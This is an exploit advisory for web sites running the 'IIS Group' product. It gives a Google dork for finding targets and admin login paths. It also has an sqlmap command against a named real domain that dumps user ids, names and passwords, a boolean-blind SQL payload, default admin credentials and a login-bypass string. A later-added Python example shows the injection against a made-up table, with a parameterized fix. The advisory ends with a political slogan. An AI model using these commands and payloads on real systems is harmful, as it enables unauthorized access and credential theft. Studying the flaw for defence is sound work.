# Exploit Title: IIS Group Admin Panel Bypass And SQL Injection Vulnerability
# Author : TrazeR & Sipahiler & TurkZ.org
# Google Dork : intext:"Powered by IIS Group"
# Tested on : Kali Linux 2017 Chrome, Firefox
# Date : 20.12.2017
# Vendor Home: http://www.iisgroup.co.za/
# Blog : http://www.trazer.org/
# Forum : http://www.turkz.org/Forum/
# Telegram: https://t.me/turkzgrup
#################################################################################
Tutorial :
[+] Dorking in Google or another search engine
[+] Open Target
[+] /admin/
[+] /admin/login.asp
[+] SQL: GET parameter 'cat' is vulnerable
Video: https://youtu.be/YhGVu5wTtrQ
Command:
root@TrazeR:~# sqlmap --level=5 --risk=3 --threads=10 --timeout=10 --random-agent --text-only --no-cast -u "http://www.deville.co.za/products.asp?cat=35" -T users -C id,name,pw --dump
Parameter: cat (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: cat=35 AND 8346=8346
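An added example (not part of the advisory) that reproduces the boolean-based blind condition sqlmap reports above against a constructed in-memory SQLite table standing in for products.asp: the vulnerable handler concatenates cat into the query text, while the hardened handler validates and binds it. The table, its rows and the false probe 8346=8347 are assumptions; the true probe is the payload shown above.

```python
import sqlite3


def make_db():
    """Constructed in-memory table standing in for the catalogue behind products.asp."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE products (id INTEGER, cat INTEGER, name TEXT)")
    db.executemany("INSERT INTO products VALUES (?, ?, ?)",
                   [(1, 35, "widget"), (2, 35, "gadget"), (3, 36, "gizmo")])
    return db


def products_vulnerable(db, cat):
    """The pattern behind products.asp?cat=...: the raw GET value is pasted into the SQL."""
    sql = "SELECT name FROM products WHERE cat=" + cat
    return [row[0] for row in db.execute(sql)]


def products_safe(db, cat):
    """Hardened form: cat must parse as an integer and is bound as a parameter."""
    try:
        cat_id = int(cat)
    except ValueError:
        return []  # reject malformed input instead of letting the database see it
    rows = db.execute("SELECT name FROM products WHERE cat=?", (cat_id,))
    return [row[0] for row in rows]


def page_shows_products(db, handler, cat):
    """True when the page would list products: the signal boolean-based blind keys on.
    A syntax error (e.g. cat=35') counts as an empty page, as on a real site."""
    try:
        return len(handler(db, cat)) > 0
    except sqlite3.OperationalError:
        return False


def injectable(db, handler):
    """sqlmap-style check: the page answers the true tautology reported above
    differently from a false one (8346=8347, constructed for this example)."""
    true_probe = "35 AND 8346=8346"
    false_probe = "35 AND 8346=8347"
    return page_shows_products(db, handler, true_probe) != page_shows_products(db, handler, false_probe)


if __name__ == "__main__":
    db = make_db()
    print("vulnerable handler injectable:", injectable(db, products_vulnerable))  # True
    print("hardened handler injectable:", injectable(db, products_safe))  # False
```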
Demo:
Credentials:
Username: admin
Password: admin
Login bypass payload (admin/login.asp):
Username: '=''or'
Password: '=''or'
FREE PALESTINE & FREE GAZA ===> ISRAEL TERRORIST #KUDUS İSLAMİNDİR!